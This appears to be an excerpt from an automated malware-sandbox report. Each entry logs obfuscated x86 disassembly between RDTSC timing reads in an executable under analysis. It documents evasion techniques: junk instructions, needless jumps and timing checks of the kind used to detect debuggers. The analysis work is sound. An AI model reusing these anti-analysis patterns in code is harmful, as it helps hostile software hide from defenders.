Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F601C3 second address: 6F60211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FDC00CE27B9h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FDC00CE27AEh 0x00000017 mov esi, dword ptr [775606ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60211 second address: 6F60215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60215 second address: 6F6021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6021B second address: 6F60221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60221 second address: 6F60225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60225 second address: 6F60229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60229 second address: 6F6028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FDC00CE27AAh 0x0000000f jne 00007FDC00CE35FAh 0x00000015 pushad 0x00000016 mov di, si 0x00000019 pushfd 0x0000001a jmp 00007FDC00CE27AAh 0x0000001f and ecx, 09DE7F28h 0x00000025 jmp 00007FDC00CE27ABh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007FDC00CE27B6h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDC00CE27AEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6028D second address: 6F602C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov di, si 0x0000000e mov dl, ah 0x00000010 popad 0x00000011 call dword ptr [77530B60h] 0x00000017 mov eax, 756AE5E0h 0x0000001c ret 0x0000001d jmp 00007FDC0050BD53h 0x00000022 push 00000044h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, ebx 0x00000029 mov bl, D0h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6038C second address: 6F60392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60416 second address: 6F6041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6041C second address: 6F60434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60434 second address: 6F60438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60438 second address: 6F6043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6043C second address: 6F60442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60442 second address: 6F60518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 sbb eax, 0F63D068h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 jmp 00007FDC00CE27B8h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f pushad 0x00000020 mov al, A0h 0x00000022 pushfd 0x00000023 jmp 00007FDC00CE27B3h 0x00000028 jmp 00007FDC00CE27B3h 0x0000002d popfd 0x0000002e popad 0x0000002f je 00007FDC7126199Bh 0x00000035 pushad 0x00000036 mov ecx, 5CB3593Bh 0x0000003b mov si, 4E17h 0x0000003f popad 0x00000040 sub eax, eax 0x00000042 pushad 0x00000043 mov edx, 6FCBFD9Ch 0x00000048 movsx edx, si 0x0000004b popad 0x0000004c mov dword ptr [esi], edi 0x0000004e pushad 0x0000004f mov ch, 17h 0x00000051 pushfd 0x00000052 jmp 00007FDC00CE27AFh 0x00000057 add eax, 0586ABCEh 0x0000005d jmp 00007FDC00CE27B9h 0x00000062 popfd 0x00000063 popad 0x00000064 mov dword ptr [esi+04h], eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FDC00CE27ADh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60518 second address: 6F60587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FDC0050BD4Eh 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 jmp 00007FDC0050BD50h 0x00000019 mov eax, dword ptr [ebx+4Ch] 0x0000001c pushad 0x0000001d mov ax, 776Dh 0x00000021 movzx ecx, dx 0x00000024 popad 0x00000025 mov dword ptr [esi+10h], eax 0x00000028 jmp 00007FDC0050BD55h 0x0000002d mov eax, dword ptr [ebx+50h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDC0050BD4Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60587 second address: 6F60597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60597 second address: 6F605D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b jmp 00007FDC0050BD57h 0x00000010 mov eax, dword ptr [ebx+54h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDC0050BD55h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F605D3 second address: 6F605D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F605D9 second address: 6F60649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e pushad 0x0000000f call 00007FDC0050BD54h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+58h] 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 pushfd 0x00000022 jmp 00007FDC0050BD52h 0x00000027 jmp 00007FDC0050BD55h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+1Ch], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60649 second address: 6F60651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60651 second address: 6F60657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60657 second address: 6F60677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 call 00007FDC00CE27AEh 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60677 second address: 6F6067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6067D second address: 6F60681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60681 second address: 6F60685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60685 second address: 6F606CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDC00CE27B4h 0x00000012 sub si, CF38h 0x00000017 jmp 00007FDC00CE27ABh 0x0000001c popfd 0x0000001d mov ch, 91h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+60h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDC00CE27ADh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F606CE second address: 6F606E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F606E3 second address: 6F60710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d mov ecx, 3BFA0ED3h 0x00000012 mov ecx, 624CC52Fh 0x00000017 popad 0x00000018 mov eax, dword ptr [ebx+64h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e movzx eax, dx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60710 second address: 6F6077A instructions: 0x00000000 rdtsc 0x00000002 mov dh, DFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDC0050BD54h 0x0000000b popad 0x0000000c mov dword ptr [esi+28h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ax, 6EA3h 0x00000015 pushfd 0x00000016 jmp 00007FDC0050BD58h 0x0000001b and ecx, 3682DFE8h 0x00000021 jmp 00007FDC0050BD4Bh 0x00000026 popfd 0x00000027 popad 0x00000028 call 00007FDC0050BD58h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60901 second address: 6F60907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60907 second address: 6F6090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6090B second address: 6F6092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6092F second address: 6F609A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f call 00007FDC0050BD4Ch 0x00000014 pop eax 0x00000015 mov dl, 55h 0x00000017 popad 0x00000018 mov dword ptr [esi+40h], eax 0x0000001b jmp 00007FDC0050BD56h 0x00000020 lea eax, dword ptr [ebx+00000080h] 0x00000026 jmp 00007FDC0050BD50h 0x0000002b push 00000001h 0x0000002d jmp 00007FDC0050BD50h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDC0050BD57h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609A9 second address: 6F609AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609AF second address: 6F609B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609B3 second address: 6F609E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 push esi 0x00000011 movsx edx, ax 0x00000014 pop ecx 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDC00CE27B2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609E4 second address: 6F609EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609EA second address: 6F609EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F609EE second address: 6F60A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f mov ecx, 386BA043h 0x00000014 mov ax, FD9Fh 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A16 second address: 6F60A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A1A second address: 6F60A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A20 second address: 6F60A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 pushfd 0x00000007 jmp 00007FDC00CE27B0h 0x0000000c sbb cl, 00000038h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov dl, 10h 0x0000001c pushfd 0x0000001d jmp 00007FDC00CE27B0h 0x00000022 or eax, 1BB70298h 0x00000028 jmp 00007FDC00CE27ABh 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A78 second address: 6F60A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A7C second address: 6F60A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A82 second address: 6F60A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60A88 second address: 6F60A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60AD4 second address: 6F60B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov cx, CEF7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FDC70A8A928h 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 mov ecx, 447DB20Bh 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp-0Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDC0050BD4Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60B03 second address: 6F60B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d mov cl, D3h 0x0000000f call 00007FDC00CE27B9h 0x00000014 movzx esi, di 0x00000017 pop edi 0x00000018 popad 0x00000019 lea eax, dword ptr [ebx+78h] 0x0000001c jmp 00007FDC00CE27B8h 0x00000021 push 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FDC00CE27B7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60B72 second address: 6F60BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDC0050BD4Ch 0x00000011 sbb eax, 134F94C8h 0x00000017 jmp 00007FDC0050BD4Bh 0x0000001c popfd 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60BBA second address: 6F60BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60BC8 second address: 6F60BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, ax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60BDE second address: 6F60C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDC00CE27AAh 0x0000000a or eax, 008B4988h 0x00000010 jmp 00007FDC00CE27ABh 0x00000015 popfd 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a pushad 0x0000001b mov di, si 0x0000001e jmp 00007FDC00CE27B0h 0x00000023 popad 0x00000024 nop 0x00000025 pushad 0x00000026 push esi 0x00000027 pop esi 0x00000028 pushfd 0x00000029 jmp 00007FDC00CE27B9h 0x0000002e or esi, 43C27206h 0x00000034 jmp 00007FDC00CE27B1h 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FDC00CE27B1h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FDC00CE27ADh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60C71 second address: 6F60C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60CA9 second address: 6F60CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, eax 0x0000000c jmp 00007FDC00CE27B7h 0x00000011 test edi, edi 0x00000013 pushad 0x00000014 mov cx, B06Bh 0x00000018 mov dx, si 0x0000001b popad 0x0000001c js 00007FDC71261188h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60CE2 second address: 6F60CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60CEA second address: 6F60D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDC00CE27ADh 0x00000015 sub esi, 6DB59F96h 0x0000001b jmp 00007FDC00CE27B1h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FDC00CE27B0h 0x00000027 sbb ah, FFFFFFB8h 0x0000002a jmp 00007FDC00CE27ABh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60D49 second address: 6F60D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 69h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 7B700DF5h 0x00000013 mov di, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60D60 second address: 6F60DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007FDC00CE27B6h 0x00000011 push 00000001h 0x00000013 jmp 00007FDC00CE27B0h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDC00CE27B7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60DC0 second address: 6F60E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC0050BD4Fh 0x00000009 jmp 00007FDC0050BD53h 0x0000000e popfd 0x0000000f push esi 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FDC0050BD55h 0x0000001a nop 0x0000001b jmp 00007FDC0050BD4Eh 0x00000020 lea eax, dword ptr [ebp-18h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60E1A second address: 6F60E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60E1E second address: 6F60E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60EEB second address: 6F60F08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60F08 second address: 6F60F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60F0E second address: 6F60FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007FDC00CE27B6h 0x00000012 mov dword ptr [esi+0Ch], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDC00CE27AEh 0x0000001c sbb eax, 38079028h 0x00000022 jmp 00007FDC00CE27ABh 0x00000027 popfd 0x00000028 call 00007FDC00CE27B8h 0x0000002d mov ebx, ecx 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov edx, 775606ECh 0x00000036 pushad 0x00000037 push edi 0x00000038 mov edi, eax 0x0000003a pop ecx 0x0000003b mov dx, 36F6h 0x0000003f popad 0x00000040 mov eax, 00000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FDC00CE27B9h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60FAF second address: 6F60FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FDC0050BD4Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 jmp 00007FDC0050BD57h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDC0050BD50h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60FF5 second address: 6F61004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
